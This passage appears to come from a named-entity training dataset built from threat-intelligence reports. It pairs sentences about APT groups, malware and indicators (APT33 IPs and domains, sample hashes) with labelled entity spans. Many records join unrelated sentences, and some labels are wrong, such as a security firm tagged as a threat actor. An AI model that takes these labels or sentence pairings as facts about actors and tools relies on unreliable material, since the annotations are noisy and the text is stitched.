One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network . These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe ) was dropped on to a computer on the victim’s network . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 . Waterbug’s intrusions on the victim’s network continued for much of 2018 . 
Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point .", "spans": {"ORGANIZATION: Unit 42": [[3, 10]], "THREAT_ACTOR: OilRig": [[56, 62], [822, 828]], "THREAT_ACTOR: SWEED": [[158, 163]], "THREAT_ACTOR: Turla": [[318, 323], [482, 487]], "TOOL: email": [[348, 353]], "MALWARE: Outlook Backdoor": [[385, 401]], "MALWARE: LightNeuron": [[409, 420]], "MALWARE: frameworks": [[543, 553]], "FILEPATH: Neptun": [[577, 583]], "ORGANIZATION: Microsoft": [[600, 609]], "THREAT_ACTOR: attackers": [[685, 694]], "THREAT_ACTOR: Crambus": [[810, 817], [2270, 2277]], "THREAT_ACTOR: APT34": [[831, 836]], "THREAT_ACTOR: Waterbug": [[839, 847], [1307, 1315], [1462, 1470], [1649, 1657], [1826, 1834], [2043, 2051], [2557, 2565], [2669, 2677]], "MALWARE: Meterpreter": [[863, 874], [953, 964]], "THREAT_ACTOR: Waterbug’s": [[1072, 1082], [1213, 1223], [2400, 2410]], "MALWARE: Crambus infrastructure": [[1090, 1112]], "ORGANIZATION: compromise governments": [[1501, 1523]], "ORGANIZATION: international organizations": [[1528, 1555]], "ORGANIZATION: IT": [[1603, 1605]], "ORGANIZATION: education sectors": [[1610, 1627]], "ORGANIZATION: infrastructure": [[1729, 1743]], "ORGANIZATION: Symantec": [[1746, 1754], [2475, 2483]], "MALWARE: Mimikatz": [[1784, 1792], [1909, 1917]], "ORGANIZATION: education": [[1975, 1984]], "FILEPATH: msfgi.exe": [[2141, 2150]], "ORGANIZATION: Crambus infrastructure": [[2696, 2718]]}, "info": {"id": "cyberner_stix_train_002075", "source": "cyberner_stix_train"}} {"text": "Debug BuildConfig with the version After a deep analysis of all discovered versions of Skygofree , we made an approximate timeline of the implant ’ s evolution . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . 
It is responsible for the Operation SMN campaign .", "spans": {"MALWARE: Skygofree": [[87, 96]], "THREAT_ACTOR: OceanLotus": [[166, 176]]}, "info": {"id": "cyberner_stix_train_002076", "source": "cyberner_stix_train"}} {"text": "Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": {"THREAT_ACTOR: groups": [[6, 12]], "THREAT_ACTOR: Buhtrap": [[23, 30]], "THREAT_ACTOR: Corkow": [[33, 39]], "THREAT_ACTOR: Carbanak": [[44, 52]], "ORGANIZATION: financial institutions": [[118, 140]], "ORGANIZATION: customers": [[151, 160]], "ORGANIZATION: Proofpoint": [[243, 253]], "ORGANIZATION: embassies": [[372, 381]]}, "info": {"id": "cyberner_stix_train_002077", "source": "cyberner_stix_train"}} {"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"MALWARE: Leader": [[151, 157]], "MALWARE: Bookworm": [[161, 169]], "MALWARE: Trojan": [[227, 233]], "FILEPATH: DLLs": [[265, 269]]}, "info": {"id": "cyberner_stix_train_002078", "source": "cyberner_stix_train"}} {"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . 
For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": {"VULNERABILITY: EternalBlue": [[20, 31]], "TOOL: Metasploit": [[43, 53]], "THREAT_ACTOR: actors": [[82, 88]], "ORGANIZATION: CTU": [[157, 160]]}, "info": {"id": "cyberner_stix_train_002079", "source": "cyberner_stix_train"}} {"text": "It installs malicious modules with different functionality into the system . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon . The scale and impact of APT1 ’s operations compelled us to write this report . Together with our partner CrySyS Lab , we ’ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": {"THREAT_ACTOR: APT1": [[250, 254]], "ORGANIZATION: CrySyS Lab": [[331, 341]], "MALWARE: Miniduke": [[418, 426]]}, "info": {"id": "cyberner_stix_train_002080", "source": "cyberner_stix_train"}} {"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm . Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . 
These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": {"ORGANIZATION: Trend Micro": [[133, 144]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[172, 208]], "ORGANIZATION: Worry-Free™ Business Security": [[213, 242]], "ORGANIZATION: businesses": [[265, 275]], "MALWARE: malicious files": [[308, 323]], "THREAT_ACTOR: Lazarus group": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002081", "source": "cyberner_stix_train"}} {"text": "Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "TOOL: ICS": [[41, 44], [226, 229]], "THREAT_ACTOR: XENOTIME": [[107, 115]]}, "info": {"id": "cyberner_stix_train_002082", "source": "cyberner_stix_train"}} {"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": {"THREAT_ACTOR: STRONTIUM": [[35, 44]], "ORGANIZATION: Olympic": [[61, 68]]}, "info": {"id": "cyberner_stix_train_002083", "source": "cyberner_stix_train"}} {"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover , Wild Positron E-MAL/Duuzer , and Hangman .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[38, 50]], "MALWARE: Destover": [[66, 74]], "MALWARE: Wild": [[77, 81]], "MALWARE: Positron E-MAL/Duuzer": [[82, 103]], "MALWARE: Hangman": [[110, 117]]}, "info": {"id": "cyberner_stix_train_002084", "source": "cyberner_stix_train"}} {"text": "Based on information gained from discussion with the initial TRITON / TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of 
adversary activity roughly matching FireEye ’s analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON": [[61, 67]], "MALWARE: TRISIS": [[70, 76]], "ORGANIZATION: Dragos": [[147, 153]], "ORGANIZATION: FireEye": [[238, 245]]}, "info": {"id": "cyberner_stix_train_002085", "source": "cyberner_stix_train"}} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "ORGANIZATION: Bellingcat": [[245, 255]], "FILEPATH: decoy documents": [[324, 339]], "TOOL: VirusTotal": [[355, 365]], "FILEPATH: http://voguextra.com/decoy.doc": [[377, 407]]}, "info": {"id": "cyberner_stix_train_002086", "source": "cyberner_stix_train"}} {"text": "Unit 42 tracks the toolkits delivering FakeM under the names MNKit , WingD and Tran Duy Linh . Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: FakeM": [[39, 44]], "TOOL: MNKit": [[61, 66]], "TOOL: WingD": [[69, 74]], "TOOL: Tran Duy Linh": [[79, 92]], "THREAT_ACTOR: Gallmaker": [[95, 104]], "ORGANIZATION: embassies": [[120, 129]]}, "info": {"id": "cyberner_stix_train_002087", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "MALWARE: Lamberts toolkit": [[186, 202]]}, "info": {"id": "cyberner_stix_train_002088", "source": "cyberner_stix_train"}} {"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"THREAT_ACTOR: APT38": [[169, 174]], "ORGANIZATION: international entities": [[289, 311]], "THREAT_ACTOR: TEMP.Hermit": [[322, 333]], "FILEPATH: Backdoor.Nidiran": [[524, 540]]}, "info": {"id": "cyberner_stix_train_002089", "source": "cyberner_stix_train"}} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . 
Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "TOOL: e-mail": [[355, 361]], "ORGANIZATION: critical infrastructure engineering firms": [[399, 440]], "ORGANIZATION: government agencies": [[443, 462]], "ORGANIZATION: financial houses": [[465, 481]], "ORGANIZATION: academia": [[486, 494]]}, "info": {"id": "cyberner_stix_train_002090", "source": "cyberner_stix_train"}} {"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[103, 124]], "ORGANIZATION: Wikileaks": [[152, 161]], "VULNERABILITY: exploit": [[189, 196]], "MALWARE: Mikrotik": [[207, 215]], "MALWARE: ChimayRed": [[223, 232]]}, "info": {"id": "cyberner_stix_train_002091", "source": "cyberner_stix_train"}} {"text": "From the emails ( and the attachments ) it looks like the goal of the attackers was to infect and take control of the systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror attack .", "spans": {"TOOL: emails": [[9, 15]]}, "info": {"id": "cyberner_stix_train_002092", "source": "cyberner_stix_train"}} {"text": "CTU researchers recommend the following practices to prevent or detect TG-3390 intrusions :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[71, 78]]}, "info": {"id": "cyberner_stix_train_002093", "source": "cyberner_stix_train"}} {"text": "Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform 
(K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . Our research indicates that it has started targeting Japanese users .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "ORGANIZATION: Japanese users": [[231, 245]]}, "info": {"id": "cyberner_stix_train_002094", "source": "cyberner_stix_train"}} {"text": "The article describes the malicious document and the Seduploader reconnaissance malware , especially the difference with the previous versions .", "spans": {"MALWARE: Seduploader": [[53, 64]]}, "info": {"id": "cyberner_stix_train_002095", "source": "cyberner_stix_train"}} {"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . The subject is a series of targeted attacks against private companies .", "spans": {"THREAT_ACTOR: activity groups": [[39, 54]], "THREAT_ACTOR: PROMETHIUM": [[57, 67]], "THREAT_ACTOR: NEODYMIUM": [[72, 81]], "VULNERABILITY: zeroday exploit": [[140, 155]], "ORGANIZATION: private companies": [[255, 272]]}, "info": {"id": "cyberner_stix_train_002096", "source": "cyberner_stix_train"}} {"text": "The open source and several other samples we found give a dynamically-assigned 1 byte ID at compile time .", "spans": {}, "info": {"id": "cyberner_stix_train_002097", "source": "cyberner_stix_train"}} {"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run . MyWeb is the second-generation malware used by Ke3chang . Furthermore, the email address used in Reply-To is from a free email client . 
This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": {"TOOL: MyWeb": [[201, 206]], "THREAT_ACTOR: Ke3chang": [[248, 256]], "TOOL: email": [[276, 281], [322, 327]]}, "info": {"id": "cyberner_stix_train_002098", "source": "cyberner_stix_train"}} {"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"TOOL: BokBot malware": [[4, 18]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[285, 329]], "ORGANIZATION: ATMs": [[334, 338]]}, "info": {"id": "cyberner_stix_train_002099", "source": "cyberner_stix_train"}} {"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64.251.19.216 [REDACTED].myftp.biz . 
Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"MALWARE: Shedun": [[82, 88]], "TOOL: SMB worm": [[204, 212]], "TOOL: WCry": [[227, 231]], "THREAT_ACTOR: APT33": [[277, 282]], "IP_ADDRESS: 64.251.19.216": [[285, 298]], "DOMAIN: [REDACTED].myftp.biz": [[299, 319]], "MALWARE: Royal": [[344, 349]], "MALWARE: BlackSuit": [[354, 363]]}, "info": {"id": "cyberner_stix_train_002100", "source": "cyberner_stix_train"}} {"text": "Then , a request is formed in such a way that an activity that installs the application is called , bypassing all security checks . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on . The decryption process involves ADD and XOR operations , using a key hardcoded in the binary . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"TOOL: mimikatz": [[193, 201]], "TOOL: third-party remote access tool": [[230, 260]], "TOOL: RDP": [[307, 310]]}, "info": {"id": "cyberner_stix_train_002101", "source": "cyberner_stix_train"}} {"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled it with their own modifications . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . 
Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": {"SYSTEM: Android": [[148, 155]], "SYSTEM: Android Studio": [[170, 184]], "THREAT_ACTOR: Buhtrap": [[254, 261]], "ORGANIZATION: businesses": [[276, 286]]}, "info": {"id": "cyberner_stix_train_002102", "source": "cyberner_stix_train"}} {"text": "Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging , you can uncover a substantial amount of operationally useful indicators to protect you and yours .", "spans": {}, "info": {"id": "cyberner_stix_train_002103", "source": "cyberner_stix_train"}} {"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously . 
That Budworm continues to use a known malware SysUpdate , alongside techniques it is known to favor , such as DLL sideloading using an application it has used for this purpose before , indicate that the group is nt too concerned about having this activity associated with it if it is discovered .", "spans": {"MALWARE: Asacub": [[20, 26]], "THREAT_ACTOR: Budworm": [[508, 515]], "MALWARE: malware SysUpdate": [[541, 558]], "THREAT_ACTOR: group": [[706, 711]]}, "info": {"id": "cyberner_stix_train_002104", "source": "cyberner_stix_train"}} {"text": "At execution , it installs an application-defined Windows hook .", "spans": {"SYSTEM: Windows": [[50, 57]]}, "info": {"id": "cyberner_stix_train_002105", "source": "cyberner_stix_train"}} {"text": "It will appear differently to users depending on the language set on the device . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . “ winserv.exe ” file .", "spans": {"THREAT_ACTOR: They": [[82, 86]], "ORGANIZATION: (WADA)": [[146, 152]], "FILEPATH: winserv.exe": [[230, 241]]}, "info": {"id": "cyberner_stix_train_002106", "source": "cyberner_stix_train"}} {"text": "Many hacktools are made for less than ethical purposes and are freely available , so this was an initial red flag , which led us to investigate further .", "spans": {}, "info": {"id": "cyberner_stix_train_002107", "source": "cyberner_stix_train"}} {"text": "Armed with this code , we removed this first layer of anti-analysis protection . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 . 
In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[105, 118]], "ORGANIZATION: individual": [[153, 163]], "TOOL: DLL": [[269, 272]], "TOOL: RC5": [[318, 321]], "THREAT_ACTOR: Hack520": [[355, 362]]}, "info": {"id": "cyberner_stix_train_002108", "source": "cyberner_stix_train"}} {"text": "Collection T1417 Input Capture Records user input data . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 . Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years .", "spans": {"THREAT_ACTOR: Crambus": [[119, 126]], "ORGANIZATION: Talos": [[249, 254]], "MALWARE: Remote Administration Tool": [[281, 307]]}, "info": {"id": "cyberner_stix_train_002109", "source": "cyberner_stix_train"}} {"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": {"THREAT_ACTOR: Scattered Canary": [[95, 111]], "MALWARE: White Lambert samples": [[302, 323]], "MALWARE: White": [[370, 375]], "MALWARE: Pink Lambert malware families": [[380, 409]]}, "info": {"id": "cyberner_stix_train_002110", "source": "cyberner_stix_train"}} {"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . 
Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {"THREAT_ACTOR: PassCV": [[4, 10]], "ORGANIZATION: game companies": [[90, 104]], "ORGANIZATION: CTU": [[235, 238]]}, "info": {"id": "cyberner_stix_train_002111", "source": "cyberner_stix_train"}} {"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]], "MALWARE: DNS-based attack technique": [[267, 293]], "ORGANIZATION: Arbor 's ASERT Team": [[424, 443]]}, "info": {"id": "cyberner_stix_train_002112", "source": "cyberner_stix_train"}} {"text": "ORat malware sample : a0758535cf8eb689782b95d3791d23d5 , 774a9c3ff01a3e734b7bec0c312120126295fad9 , 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82 .", "spans": {"MALWARE: ORat": [[0, 4]], "FILEPATH: a0758535cf8eb689782b95d3791d23d5": [[22, 54]], "FILEPATH: 774a9c3ff01a3e734b7bec0c312120126295fad9": [[57, 97]], "FILEPATH: 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82": [[100, 164]]}, "info": {"id": "cyberner_stix_train_002113", "source": "cyberner_stix_train"}} {"text": "In the screenshots below , Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk , loads the DLL using rundll32 , sets the DLL as a service , and saves a copy of itself in C:\\Windows\\Help .", "spans": {"TOOL: Windows Defender ATP": 
[[27, 47]], "TOOL: DLL": [[116, 119], [140, 143], [170, 173]]}, "info": {"id": "cyberner_stix_train_002114", "source": "cyberner_stix_train"}} {"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": {"THREAT_ACTOR: PLATINUM": [[32, 40]], "TOOL: AMT Technology SDK": [[77, 95]], "TOOL: Redirection Library API": [[99, 122]], "MALWARE: imrsdk.dll": [[125, 135]], "TOOL: emails": [[160, 166]]}, "info": {"id": "cyberner_stix_train_002115", "source": "cyberner_stix_train"}} {"text": "Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions .", "spans": {}, "info": {"id": "cyberner_stix_train_002116", "source": "cyberner_stix_train"}} {"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . This suggests to us that Thrip 's motives go beyond spying and may also include disruption .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[43, 60]]}, "info": {"id": "cyberner_stix_train_002117", "source": "cyberner_stix_train"}} {"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213.252.244.14 service-avant.com . Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": {"ORGANIZATION: U.S. 
Government": [[171, 186], [302, 317]], "ORGANIZATION: DHS": [[198, 201]], "ORGANIZATION: FBI": [[206, 209]], "TOOL: Trojan malware": [[221, 235]], "THREAT_ACTOR: APT33": [[331, 336]], "IP_ADDRESS: 213.252.244.14": [[339, 353]], "DOMAIN: service-avant.com": [[354, 371]]}, "info": {"id": "cyberner_stix_train_002118", "source": "cyberner_stix_train"}} {"text": "Afterwards , they establish phishing sites on these domains that spoof the look and feel of the victim ’s web-based email services in order to steal their credentials .", "spans": {"TOOL: email": [[116, 121]]}, "info": {"id": "cyberner_stix_train_002119", "source": "cyberner_stix_train"}} {"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": {"THREAT_ACTOR: Cobalt": [[23, 29]]}, "info": {"id": "cyberner_stix_train_002120", "source": "cyberner_stix_train"}} {"text": "This matches our observations of C2 servers as shown in Figure 7 . However , the attack on January 16 did not involve ThreeDollars at all . Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists . 
Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"TOOL: ThreeDollars": [[118, 130]], "TOOL: VMs": [[154, 157]], "ORGANIZATION: Ashley Madison": [[244, 258]], "ORGANIZATION: Avid Life Media": [[295, 310]], "ORGANIZATION: Dennis Bradshaw": [[402, 417]]}, "info": {"id": "cyberner_stix_train_002121", "source": "cyberner_stix_train"}} {"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . APT33 : 64.251.19.232 mynetwork.ddns.net . They also list nebiltech[.]shop in their IOCs which is a domain we sometimes saw injected near the Google Tag Manager script , but not within it .", "spans": {"TOOL: WannaCry": [[234, 242]], "MALWARE: .WCRY": [[281, 286]], "THREAT_ACTOR: APT33": [[404, 409]], "IP_ADDRESS: 64.251.19.232": [[412, 425]], "DOMAIN: mynetwork.ddns.net": [[426, 444]], "MALWARE: Google Tag Manager script": [[546, 571]]}, "info": {"id": "cyberner_stix_train_002122", "source": "cyberner_stix_train"}} {"text": "We found two functions : The first function is http : //s.psserviceonline [ . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . 
The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": {"ORGANIZATION: Kaspersky": [[78, 87]], "THREAT_ACTOR: BlackOasis group": [[98, 114]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[132, 173]], "VULNERABILITY: CVE-2016-4117": [[176, 189]], "TOOL: FinSpy": [[236, 242]], "MALWARE: DNSMessenger": [[307, 319]], "MALWARE: malware": [[320, 327]], "THREAT_ACTOR: FIN7": [[355, 359]], "THREAT_ACTOR: MuddyWater": [[362, 372]], "THREAT_ACTOR: groups": [[391, 397]]}, "info": {"id": "cyberner_stix_train_002123", "source": "cyberner_stix_train"}} {"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions , and added open-source DLL injection code from ReflectiveDLLLoader .", "spans": {"MALWARE: Ginp": [[31, 35]], "THREAT_ACTOR: Rapid7": [[320, 326]], "MALWARE: the NamelessHdoor": [[343, 360]], "MALWARE: Nameless Backdoor": [[412, 429]], "TOOL: DLL": [[488, 491]], "TOOL: ReflectiveDLLLoader": [[512, 531]]}, "info": {"id": "cyberner_stix_train_002124", "source": "cyberner_stix_train"}} {"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL “ ASPNET_FILTER.DLL ” to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"TOOL: DLL": [[86, 89], [134, 137]], "FILEPATH: ASPNET_FILTER.DLL": [[92, 109]], "FILEPATH: ASP.NET": [[146, 153]]}, "info": {"id": "cyberner_stix_train_002125", "source": "cyberner_stix_train"}} {"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing 
APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": {"ORGANIZATION: managed IT service providers": [[74, 102]], "ORGANIZATION: MSPs": [[105, 109], [217, 221]], "THREAT_ACTOR: APT10": [[123, 128]], "ORGANIZATION: FireEye": [[270, 277]], "MALWARE: TRITON": [[368, 374]]}, "info": {"id": "cyberner_stix_train_002126", "source": "cyberner_stix_train"}} {"text": "This is a common trick played by malware developers , making the user think the app may have been removed . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"THREAT_ACTOR: Silence": [[127, 134]], "ORGANIZATION: Asian market": [[169, 181]], "THREAT_ACTOR: criminal groups": [[248, 263]], "THREAT_ACTOR: PoSeidon": [[324, 332]], "MALWARE: Carbanak": [[368, 376]], "THREAT_ACTOR: criminal organization": [[394, 415]], "THREAT_ACTOR: Carbon Spider": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002127", "source": "cyberner_stix_train"}} {"text": "Second Phase The second phase dex file contains 3 main services that are being used : • ConnManager - handles connections to the C & C • ReceiverManager - waits for incoming calls / app installations • TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks . 
